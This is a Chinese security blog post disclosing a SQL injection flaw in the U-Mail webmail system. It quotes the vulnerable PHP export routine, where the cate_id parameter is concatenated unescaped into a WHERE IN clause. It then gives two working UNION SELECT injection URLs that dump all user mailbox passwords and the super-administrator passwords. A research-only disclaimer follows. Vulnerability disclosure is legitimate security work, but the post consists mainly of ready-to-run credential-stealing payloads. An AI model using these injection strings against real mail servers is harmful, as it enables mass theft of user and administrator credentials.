U-Mail邮件服务系统存在漏洞可获取所有用户密码

没穿底裤
没穿底裤
没穿底裤
714
文章
0
评论
2020年1月1日04:42:35评论529 views字数 36阅读0分7秒阅读模式
摘要

/client/cab/module/operates.php
[php]
................
if ( ACTION == "customer-export" )
{
$cate_id = gss( $_GET['cate_id'] ) ? gss( $_GET['cate_id'] ) : "-1"; //获取cate_id
if ( $cate_id )
{
$data_cache = $CAB->getCategoryByDomainID( $domain_id, 0 );
$where = "domain_id='".$domain_id."'";
if ( $cate_id == "-1" )
{
$cate_id = 0;
}
if ( $cate_id )
{
$Tree = $CAB->getTreeObject( );
$Tree->set_data_cache( $data_cache );
$Tree->sort_data( -1, 1 );
$cate_ids = $Tree->get_child_id( $cate_id );
$where .= " AND cate_id IN (".$cate_ids.")"; //直接带入了where in
}
$customer_list = $CAB->get_customer( array(
"fields" => "*",
"where" => $where,
"debug" => 0
) );
$cate_list = create_array $data_cache, "cate_id", "name" );
$string = "/"".el( "名称", "" )."/",/"".el( "邮箱", "" )."/",/"".el( "电话号码", "" )."/",/"".el( "分类", "" )."/",/"".el( "备注", "" )."/",/"".el( "生日", "" )."/",/"".el( "性别", "" )."/",/"".el( "单位电话", "" )."/",/"".el( "住宅电话", "" )."/",/"".el( "QQ", "" )."/",/"".el( "MSN", "" )."/"/n";
if ( $customer_list )
{
foreach ( $customer_list as $user )
{
$string .= "/"".$user['fullname']."/",";
$string .= "/"".$user['pref_email']."/",";
$string .= "/"".$user['pref_tel']."/",";
$string .= "/"".$cate_list[$user['cate_id']]."/",";
$string .= "/"".$user['remark']."/",";
$string .= "/"".$user['birthday']."/",";
$string .= "/"".$user['gender']."/",";
$string .= "/"".$user['work_tel']."/",";
$string .= "/"".$user['home_tel']."/",";
$string .= "/"".$user['im_qq']."/",";
$string .= "/"".$user['im_msn']."/",";
$string .= "/r/n";
}
}
}
if ( get_session( "language" ) == "zh" )
{
$out_data = iconv( "UTF-8", "GBK", $string );
}
else
{
$out_data = $string;
}
header( "Content-type: text/plain" );
header( "Content-Disposition: attachment; filename=Address.csv" );
header( "Cache-Control: must-revalidate, post-check=0, pre-check=0" );
header( "Expires: 0" );
header( "Pragma: public" );
echo $out_data;
exit( );
}
...............
?>
[/php]
$where .= " AND cate_id IN (".$cate_ids.")";

/client/cab/module/operates.php
[php]
................
if ( ACTION == "customer-export" )
{
$cate_id = gss( $_GET['cate_id'] ) ? gss( $_GET['cate_id'] ) : "-1"; //获取cate_id
if ( $cate_id )
{
$data_cache = $CAB->getCategoryByDomainID( $domain_id, 0 );
$where = "domain_id='".$domain_id."'";
if ( $cate_id == "-1" )
{
$cate_id = 0;
}
if ( $cate_id )
{
$Tree = $CAB->getTreeObject( );
$Tree->set_data_cache( $data_cache );
$Tree->sort_data( -1, 1 );
$cate_ids = $Tree->get_child_id( $cate_id );
$where .= " AND cate_id IN (".$cate_ids.")"; //直接带入了where in
}
$customer_list = $CAB->get_customer( array(
"fields" => "*",
"where" => $where,
"debug" => 0
) );
$cate_list = create_array $data_cache, "cate_id", "name" );
$string = "/"".el( "名称", "" )."/",/"".el( "邮箱", "" )."/",/"".el( "电话号码", "" )."/",/"".el( "分类", "" )."/",/"".el( "备注", "" )."/",/"".el( "生日", "" )."/",/"".el( "性别", "" )."/",/"".el( "单位电话", "" )."/",/"".el( "住宅电话", "" )."/",/"".el( "QQ", "" )."/",/"".el( "MSN", "" )."/"/n";
if ( $customer_list )
{
foreach ( $customer_list as $user )
{
$string .= "/"".$user['fullname']."/",";
$string .= "/"".$user['pref_email']."/",";
$string .= "/"".$user['pref_tel']."/",";
$string .= "/"".$cate_list[$user['cate_id']]."/",";
$string .= "/"".$user['remark']."/",";
$string .= "/"".$user['birthday']."/",";
$string .= "/"".$user['gender']."/",";
$string .= "/"".$user['work_tel']."/",";
$string .= "/"".$user['home_tel']."/",";
$string .= "/"".$user['im_qq']."/",";
$string .= "/"".$user['im_msn']."/",";
$string .= "/r/n";
}
}
}
if ( get_session( "language" ) == "zh" )
{
$out_data = iconv( "UTF-8", "GBK", $string );
}
else
{
$out_data = $string;
}
header( "Content-type: text/plain" );
header( "Content-Disposition: attachment; filename=Address.csv" );
header( "Cache-Control: must-revalidate, post-check=0, pre-check=0" );
header( "Expires: 0" );
header( "Pragma: public" );
echo $out_data;
exit( );
}
...............
?>
[/php]
$where .= " AND cate_id IN (".$cate_ids.")";

带入查询。
[php]
http://192.168.0.119/webmail/client/cab/index.php?module=operate&action=customer-export&cate_id=0) union select 1,2,3,mailbox,5,6,password,8,9,10,11,12,13,14,15 from userlist%23
[/php]
U-Mail邮件服务系统存在漏洞可获取所有用户密码

U-Mail邮件服务系统存在漏洞可获取所有用户密码

超级管理员在这个表,同样一键脱下所有
[php]
http://192.168.0.119/webmail/client/cab/index.php?module=operate&action=customer-export&cate_id=0) union select 1,2,3,usr_name,5,6,password,8,9,10,11,12,13,14,15 from web_usr%23
[/php]

免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉。
  • 左青龙
  • 微信扫一扫
  • weinxin
  • 右白虎
  • 微信扫一扫
  • weinxin
没穿底裤
  • 本文由 发表于 2020年1月1日04:42:35
  • 转载请保留本文链接(CN-SEC中文网:感谢原作者辛苦付出):
                   U-Mail邮件服务系统存在漏洞可获取所有用户密码https://cn-sec.com/archives/75843.html
                  免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉.

发表评论

匿名网友 填写信息